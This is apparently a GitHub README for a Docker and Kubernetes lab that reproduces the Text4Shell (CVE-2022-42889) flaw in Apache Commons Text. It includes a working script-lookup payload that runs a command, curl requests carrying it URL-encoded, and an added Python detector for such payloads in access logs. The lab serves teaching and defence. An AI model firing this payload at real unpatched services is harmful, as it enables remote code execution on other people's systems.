devenes / text4shell-cve-2022-42889

Kubernetes Lab for CVE-2022-42889

Text4Shell CVE-2022-42889

Docker Lab for CVE-2022-42889

You can either build the Docker image locally or pull the image from Docker Hub and run the container.

Clone the repo

git clone https://github.com/devenes/text4shell-cve-2022-42889.git

Build the Docker image locally

docker build --tag=text4shell .

Run the Docker container

docker run -d --rm -p 8080:8080 text4shell

Or pull the image from Docker Hub and run the container

docker pull devenes/text4shell:v1.0
docker run -d --rm -p 8080:8080 devenes/text4shell:v1.0

Test the app by passing a string to the search parameter:

curl "http://localhost:8080/text4shell/attack?search=<anything>"

  • The attack is performed by passing a string of the form ${prefix:name}, where prefix is one of the lookups the vulnerable interpolator resolves (script, dns or url). With the script lookup:
${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}

Attack using curl:

curl -X GET "http://localhost:8080/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Ffoo%27%29%7D"
  • You can also try the dns or url prefixes in place of script.
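Because the payload travels URL-encoded (as in the curl command above) and the lookup prefix is case-insensitive, a naive grep for "${script" in access logs misses most variants. The following detector is an added example, not part of this repository: it URL-decodes each query parameter repeatedly (to catch double encoding), then flags any ${prefix:...} interpolation whose prefix is one of the three lookups named on this page (script, dns, url), while leaving benign default lookups such as ${date:...} alone. The log lines are constructed for the example; the second one carries the exact encoded payload shown above. Upgrading Apache Commons Text to 1.10.0, which no longer enables these three lookups by default, remains the actual fix; the detector is for finding attempts in logs.

```python
"""Detect Text4Shell (CVE-2022-42889) lookup payloads in web access logs.

Added example; assumes Apache/nginx "combined" log format for the sample lines.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Lookup prefixes abused by CVE-2022-42889 (the ones named in this lab).
DANGEROUS_PREFIXES = ("script", "dns", "url")

# ${prefix:...} with optional whitespace; prefix is matched case-insensitively.
LOOKUP_RE = re.compile(r"\$\{\s*(?P<prefix>[a-zA-Z]+)\s*:", re.IGNORECASE)

# Pulls the request target out of a combined-format log line.
LOG_LINE_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def fully_decode(value: str, max_rounds: int = 3) -> str:
    """URL-decode repeatedly until the string stops changing (double encoding)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_dangerous_lookups(text: str) -> list:
    """Return the dangerous lookup prefixes present in text after decoding."""
    decoded = fully_decode(text)
    return [
        m.group("prefix").lower()
        for m in LOOKUP_RE.finditer(decoded)
        if m.group("prefix").lower() in DANGEROUS_PREFIXES
    ]


def inspect_request_target(target: str) -> dict:
    """Check every query parameter (and the path) of one request target.

    Returns {parameter_name: [prefixes]} for parameters carrying a payload.
    """
    parts = urlsplit(target)
    findings = {}
    # parse_qsl decodes one layer; fully_decode handles any further layers.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        hits = find_dangerous_lookups(value)
        if hits:
            findings[name] = hits
    path_hits = find_dangerous_lookups(parts.path)
    if path_hits:
        findings["<path>"] = path_hits
    return findings


def scan_access_log(lines) -> list:
    """Return (line_number, request_target, findings) for each suspicious line."""
    alerts = []
    for lineno, line in enumerate(lines, 1):
        m = LOG_LINE_RE.search(line)
        if not m:
            continue  # not a request line we understand
        findings = inspect_request_target(m.group("target"))
        if findings:
            alerts.append((lineno, m.group("target"), findings))
    return alerts


# Constructed sample log lines (not captured from the lab). Line 2 uses the
# encoded payload from this page; line 3 is a double-encoded, upper-cased dns
# lookup with a placeholder argument; line 4 is a benign default lookup.
SAMPLE_LOG = [
    '10.0.0.5 - - [18/Oct/2022:10:00:01 +0000] "GET /text4shell/attack?search=hello HTTP/1.1" 200 12',
    '10.0.0.9 - - [18/Oct/2022:10:00:02 +0000] "GET /text4shell/attack?search='
    '%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Ffoo%27%29%7D HTTP/1.1" 200 12',
    '10.0.0.9 - - [18/Oct/2022:10:00:03 +0000] "GET /text4shell/attack?search=%2524%257BDNS%253Aplaceholder%257D HTTP/1.1" 200 12',
    '10.0.0.7 - - [18/Oct/2022:10:00:04 +0000] "GET /text4shell/attack?search=%24%7Bdate%3Ayyyy%7D HTTP/1.1" 200 12',
]

if __name__ == "__main__":
    for lineno, target, findings in scan_access_log(SAMPLE_LOG):
        print(f"line {lineno}: {findings} in {target}")
```

Run against real logs by replacing SAMPLE_LOG with the file's lines; anything flagged with the script prefix on a host running Commons Text below 1.10.0 should be treated as a likely code-execution attempt and the host checked for the side effects the attacker asked for (in this lab, the file in /tmp).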

Get the container id

docker container ls

Get into the container

docker exec -it <container_id> bash

Check if the RCE attack was successful

  • You should see a file named foo created in the /tmp directory:
ls /tmp/

You can stop the container by running the following command

docker container stop <container_id>

Kubernetes Lab for CVE-2022-42889

Change into the kubernetes directory and follow the instructions in its README.md file.

cd kubernetes

Create kind cluster

kind create cluster --config kind-config.yaml

Deploy the vulnerable app to the cluster

kubectl apply -f deployment.yaml

Create a service to expose the app

kubectl apply -f service.yaml

Attack the vulnerable app using curl

curl -X GET "http://localhost:8080/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Ffoo%27%29%7D"

Get the pod name using kubectl get pods

kubectl get pods

Get into the pod using kubectl exec

kubectl exec -it $(kubectl get pods | grep text4shell | awk '{print $1}') -- bash

Check if the attack was successful

ls /tmp/ | grep foo

You can find the detailed tutorial on my Udemy course here
